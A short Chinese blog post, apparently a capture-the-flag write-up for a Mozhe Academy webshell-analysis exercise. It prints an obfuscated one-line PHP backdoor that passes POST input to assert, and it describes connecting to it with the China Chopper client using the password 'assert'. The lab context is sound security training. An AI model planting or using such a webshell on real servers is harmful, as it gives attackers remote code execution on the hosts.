美文网首页
墨者学院 - WebShell代码分析溯源(第2题)

墨者学院 - WebShell代码分析溯源(第2题)

作者: 这是什么娃哈哈 | 来源:发表于2018-09-23 21:15 被阅读0次

首先打开题目的网址,发现可以下载网站的源码,我们把网站的源码下载下来,用seay源代码审计系统找一下网站的漏洞

发现一处后门漏洞

<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>

打开菜刀链接

http://IP地址/www/index.php?post=assert  链接密码  assert  即可获取key

相关文章

网友评论

      本文标题:墨者学院 - WebShell代码分析溯源(第2题)

      本文链接:https://www.haomeiwen.com/subject/bivqoftx.html